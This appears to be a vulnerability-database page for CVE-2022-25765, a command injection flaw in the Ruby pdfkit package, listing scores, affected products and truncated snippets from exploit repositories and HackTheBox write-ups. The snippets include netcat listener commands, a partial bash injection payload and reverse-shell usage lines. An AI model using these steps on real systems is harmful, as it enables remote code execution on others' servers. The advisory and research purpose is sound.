9.8
CVSSv3

CVE-2022-25765

Published: 09/09/2022 Updated: 07/11/2023
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 0

Vulnerability Summary

The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

pdfkit project pdfkit

fedoraproject fedora 35

fedoraproject fedora 36

fedoraproject fedora 37

Exploits

pdfkit version 0872 suffers from a command injection vulnerability ...

Github Repositories

1nginx is running with what additional software designed to serve web applications? First what we need to do is turn on nmap, and check the resul: But on the scan we don't have any special, we need to go on this website and check what's is there, after small recon i use wapalyzer and i found it, this a Phusion Passenger 2Which HTTP response header reveals the under

pdfkit <0.8.6 command injection shell. The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized. (Tested on ver 0.8.6) - CVE-2022-25765

CVE-2022-25765-pdfkit-Exploit-Reverse-Shell pdfkit &lt;086 command injection shell The package pdfkit from 000 are vulnerable to Command Injection where the URL is not properly sanitized (Tested on ver 086) - CVE-2022-25765 Pre-reqs: Setup HTTP Server - python3 -m httpserver Setup Netcat Listener - nc -lvnp 4444 Reverse Ruby Shell via webpage: LOCAL-IP:LOC

Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6

PDFkit-CMD-Injection (CVE-2022-25765) Exploit for CVE-2022-25765 command injection in pdfkit &lt; 086 See more details about the vulnerability here PoC Run the netcat on your host: $ nc -lvnp 1337 Run the exploit (example): $ /CVE-2022-25765py -t localhost -a 101014122 -p 1337 [*] Input target address is localhost

CVE-2022-25765 pdfkit 0.8.6 command injection.

PDFkit-CMD-Injection CVE-2022-25765 Detail Description The package pdfkit from 000 are vulnerable to Command Injection where the URL is not properly sanitized PoC Start a HTTP server 1- python3 -m httpserver 80 Start a netcat listener 2- nc -lnvp 'Target Port' Make a request 3- "TARGET_ADDRESS:Target PORT"//?name=#{'%20`bash -c 'exec b

PoC for Blind RCE for CVE-2022-25765 (Tested in HTB - Precious Machine)

CVE-2022-25765 PoC for Blind RCE for CVE-2022-25765 (Tested in HTB - Precious Machine)

CVE-2022-25765 pdfkit <0.8.6 command injection.

PDFkit-CMD-Injection CVE-2022-25765 pdfkit &lt;086 command injection The package pdfkit is vulnerable to Command Injection where the URL is not properly sanitized Note: This issue was patched in 0872, but the patch was discovered to be ineffective The updated patch version is 0872 PoC Start a HTTP server python3 -m httpserver 80

Exploit for CVE-2022-25765

CVE-2022-25765 Exploit A small POC exploit for CVE-2022-25765, PDFkit-CMD-Injection Example usage: python cve-2022-25765py -t 10401143:80 -l 10101412 -p 4444 This POC takes advantage of a Command Injection vulnerability where the URL is not properly sanitized This exploit takes an attacker's IP and Port as paramaters to be used for a reverse shell

HackTheBox: Precious Writeup Precious The initial phase involves conducting a comprehensive network scan to enumerate available ports Based on the findings, the current port configuration reveals the presence of ports 22 and 80 Upon completion of the scan, it was discovered that port 80 was hosting a web page accessible via the URL precioushtb/ In order to access th

Exploit for CVE-2022–25765 (pdfkit) - Command Injection

Exploit for CVE-2022–25765 (pdfkit) - Command Injection Like this repo? Give us a ⭐! For educational and authorized security research purposes only Exploit Author @UNICORDev by (@NicPWNs and @Dev-Yeoj) Vulnerability Description The package pdfkit from 000 are vulnerable to Command Injection where the URL is not properly sanitized Exploit Description A ruby gem pdfk